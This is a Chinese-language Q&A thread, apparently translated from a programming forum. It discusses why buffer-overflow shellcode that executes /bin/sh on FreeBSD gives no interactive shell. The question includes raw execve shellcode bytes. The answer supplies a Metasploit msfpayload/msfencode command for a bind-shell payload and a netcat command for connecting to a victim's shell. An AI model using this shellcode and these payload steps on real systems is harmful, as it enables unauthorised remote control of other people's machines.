6

我一直在 FreeBSD 系统上试验缓冲区溢出。作为第一个实验,我试图让被利用的程序启动另一个进程(在这种情况下是 /bin/hostname)。一切正常,程序打印了主机名,然后终止。之后我试图让程序产生一个shell(即执行/bin/sh)。我假设这可以通过简单地交换代表要调用的程序的字符串来完成。当我尝试这个时,被利用的程序简单地退出,根据 gdb 它确实成功地产生了一个新进程(/bin/sh)。但是,没有生成任何外壳。然后我尝试了我的第一个漏洞利用并将 /bin/sh 文件移动到 /bin/hostname,仍然没有改变任何东西。我现在的问题是,从任何其他命令执行 /bin/sh 似乎有什么不同?

作为参考,对于 shell 生成尝试,我使用了以下 shellcode:

char code[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x54\x53\xb0\x3b\x50\xcd\x80";
4

1 回答 1

3

哈,我明白你的意思,但我相信你犯了一个根本性的错误。您正在调用交互式 shell 而不绑定它。

这就像调用“ifconfig”命令。如果你想要执行单个命令,那么你的 shell 代码是完美的,但是如果你想要一个交互式 shell,你不能只运行 sh。

简单地运行 sh 将导致 shell 被执行,它不会给你对 shell 的交互控制。


解决方案: 使用 shell 代码生成器创建反向 tcp shell 或绑定 shell,并将其用作您的漏洞利用的有效负载。

如果您尝试在 Metasploit 中执行此操作,那么这里有一个您想要的示例命令。

msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/alpha_mixed -b '\x00' -t c
  • Msfpayload 是函数的名称。windows/shell_bind_tcp 是漏洞利用路径
  • LPORT 是远程受害者机器可以访问 shell 的端口
  • R 用于原始输出
  • 然后我们通过管道将其传递给 msfencode,因为我们需要它是 C 代码才能执行,并且必须针对该架构进行编译
  • -e 表示要支持的编码类型和架构,例如用于 Win Sp2
  • -b 表示您不能在 shell 代码中使用的字节。例如 00 是字符串字节的结尾
  • -t 是输出类型,如 C 代码。

多研究一点,玩一玩,你就会明白的。本质上,与执行静态命令相比,获得交互式 shell 要困难得多。

完成后,您可以使用 netcat 之类的程序来连接和使用 shell。

netcat.exe -nv <victim ip> <port where shell was bound to>

希望这是正确的解决方案。

于 2012-06-26T13:51:57.630 回答